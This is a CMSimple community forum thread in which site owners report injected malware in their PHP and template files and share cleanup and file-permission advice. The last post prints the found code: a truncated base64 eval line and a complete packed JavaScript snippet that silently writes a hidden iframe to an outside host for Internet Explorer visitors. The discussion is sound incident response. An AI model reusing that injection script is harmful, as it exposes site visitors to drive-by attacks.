WARNING !!! HACKERS !!!

A place for security related announcements and discussions - please check this forum frequently!
Post Reply
Tata
Posts: 3586
Joined: Tue May 20, 2008 5:34 am
Location: Slovakia
Contact:

WARNING !!! HACKERS !!!

Post by Tata » Tue Dec 11, 2012 12:37 pm

Visitors reported today that a website is hacked. Reviewing index.php and default.php files I'we found a code attached to each of these files
[ external image ]
How got it there is not known. Chceck your websites. At first you'll see only the first two lines of the code as the rest is TABbed far to tight.
So far no part of this string can't be found via a batch search in Notepad++. It seems to open file after file :cry:
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.

cmb
Posts: 14225
Joined: Tue Jun 21, 2011 11:04 am
Location: Bingen, RLP, DE
Contact:

Re: WARNING !!! HACKERS !!!

Post by cmb » Tue Dec 11, 2012 1:03 pm

Googling for "malware f524d6" brings some results. It seems this site isn't the only one that has been "hacked" and that it's not specificly targeted at CMSimple. Googling for "http://www.slapcentrum.se/" brings up even more interesting results.

What does the injected code do: it inserts an (nearly) invisible Iframe calling a PHP script on another site. What this script is doing? I don't know.
Tata wrote:Chceck your websites. At first you'll see only the first two lines of the code as the rest is TABbed far to tight.
I wouldn't recommend checking the websites with JS enabled, as this will already trigger the other PHP script. It's better to check the source code of the website with JS disabled.
Christoph M. Becker – Plugins for CMSimple_XH

snafu
Posts: 352
Joined: Sun Dec 26, 2010 5:18 pm

Re: WARNING !!! HACKERS !!!

Post by snafu » Tue Dec 11, 2012 1:13 pm

you can also, for first, scan your site from extern with the Free Website Malware Scanner
lg.
winni

Durch einen Sucher betrachtet wird alles zu einem Motiv.
meine Galerie; mein Blog, mein CMSimple Template Tutorial

Holger
Site Admin
Posts: 3470
Joined: Mon May 19, 2008 7:10 pm
Location: Hessen, Germany

Re: WARNING !!! HACKERS !!!

Post by Holger » Tue Dec 11, 2012 1:47 pm

snafu wrote:you can also, for first, scan your site from extern with the Free Website Malware Scanner
Maybe a good idea, but it seems that this scanner could not find the js-included iframe....
So it's useless in this special case.

KR
Holger

Tata
Posts: 3586
Joined: Tue May 20, 2008 5:34 am
Location: Slovakia
Contact:

Re: WARNING !!! HACKERS !!!

Post by Tata » Tue Dec 11, 2012 2:06 pm

It was not that tragic finally. Affected were only:
2lang/index.php
2site/index.php
cmsimple/login.php
cmsimple/languages/default.php - not under all installations
plugins/index.php

I downloaded the entire domain+subdomains and let search after longer part of the script. Notepad++ made it. But I needed to open all affected files and remove the script manually. In some of the files the script was inserted in the middle of the file (about #519).

Everything goes up now.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.

cmb
Posts: 14225
Joined: Tue Jun 21, 2011 11:04 am
Location: Bingen, RLP, DE
Contact:

Re: WARNING !!! HACKERS !!!

Post by cmb » Tue Dec 11, 2012 2:52 pm

Tata wrote:It was not that tragic finally.
That's good news! :)

But you might consider to try finding out how this has happened; otherwise it might soon happen again (it could be caused by malware on a client). At least you should remove all writing permissions from the infected files (444 or 400); they don't need them anyway.
Christoph M. Becker – Plugins for CMSimple_XH

Tata
Posts: 3586
Joined: Tue May 20, 2008 5:34 am
Location: Slovakia
Contact:

Re: WARNING !!! HACKERS !!!

Post by Tata » Tue Dec 11, 2012 3:27 pm

There must be still something in it.
I have found this script also in a language file in advancedform, also in content.htm just afer <p>{{{PLUGIN:calendar();}}}</P> and also in template.htm in <head></head>.
Now I hove downloaded the backup from this morning, when the page worked well and have uploaded it back.
The page has a picture above the navigation redirecting to a subdomain. And this doesn't work. Evidently the script must still be somewhere. Funny is, that as long as I am logged in, everything works fine. Does it point to a place, where the script is still in function?

EDIT: It was in a content.htm in one of the domains. Soon the upload is ready and CHMOD will take place.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.

Tata
Posts: 3586
Joined: Tue May 20, 2008 5:34 am
Location: Slovakia
Contact:

Re: WARNING !!! HACKERS !!!

Post by Tata » Thu Feb 21, 2013 7:20 pm

I don't know if I am to only in WWW having at least once a year hackers' visits to my webspace.
Now hundreds of files are "saturated" by

Code: Select all

eval(base64_decode("DQplcnJvcl9.........Cn0KfQ0KfQ0KfQ==")); 
The code is added just after the very first <?php in fast all (core and plugins):
language ??.php
??config.php
default.php
config.php
pagedata.php
Also one javascript.js was infected with the code "eval"

Code: Select all

(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 0=a c(),4=a c(0.i()+j);3(h.l.7("m 6")!=-1&&2.b.7("8=s")==-1){3(0.g()!=-1){5 9="d"}2.f("<e"+9+" k"+"r=1 z"+"o=1 A=\'B"+"p://x"+".y/q/\' t=\'u:n"+"w\'></3"+"v>");2.b="8=s;"+" 4="+4.C()+"; "}',39,39,'today||document|if|expires|var||indexOf|_fhjtju|iframe|new|cookie|Date|ame|ifr|write|getTimezoneOffset|navigator|getTime|2678400000|wi|appVersion|MSIE||ht||b2b|dth||style|display|rame|one|secatm|net|heig|src|htt|toGMTString'.split('|')));
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.

Post Reply